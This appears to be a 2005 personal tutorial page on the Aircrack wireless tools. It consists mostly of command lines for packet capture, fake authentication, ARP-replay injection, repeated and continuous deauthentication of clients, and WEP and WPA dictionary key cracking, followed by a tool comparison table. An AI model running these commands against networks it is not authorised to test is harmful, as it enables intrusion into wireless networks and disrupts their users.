11/Nov/2005 tested on SuSE 9.3
Aircrack is a set of tools for auditing wireless networks:
|
# airmon.sh |
|
# airodump eth0 out 0 |
|
# airodump eth0 out 1 1 |
|
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h
0:1:2:3:4:5 eth0 |
|
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0 |
|
# aireplay -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0 |
|
# aireplay -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5
-x 600 eth0 |
|
# aircrack -x -0 out.ivs |

|
# iwconfig eth0 mode Managed key
XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX |
|
# airmon.sh |
|
# airodump eth0 out 0 |
|
# airodump eth0 out 1 |
|
# aireplay -0 5 -a 00:A0:B0:40:5C:84 -c
00:04:23:52:80:41 eth0 |
|
# aireplay -0 10 -a 00:A0:B0:40:5C:84 eth0 |
|
# aireplay -0 0 -a 00:A0:B0:40:5C:84 eth0 |
|
# zcat all.gz | egrep -v '^#' > dic |
|
# aircrack -w dic -0 out.cap |

Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several days.
Here is other my reports.
| Tool | OS | CPU usage | Encryption | 802. | NIC Support | Packet injection | My recommendation |
|---|---|---|---|---|---|---|---|
| Airsnort (note) |
Windows | High | WEP | 11b | Few | Not supported | Low |
| Airsnort (note) |
Linux | High | WEP | 11b | Few | Not supported | Low |
| Aircrack (note) |
Windows | Low | WEP, WPA | 11a/b/g | Many | Not supported | Mid |
| Aircrack | Linux | Low | WEP, WPA | 11a/b/g | Many | Supported! | Recommended! |
Copyright © [- SroNey / JohN -]. All rights reserved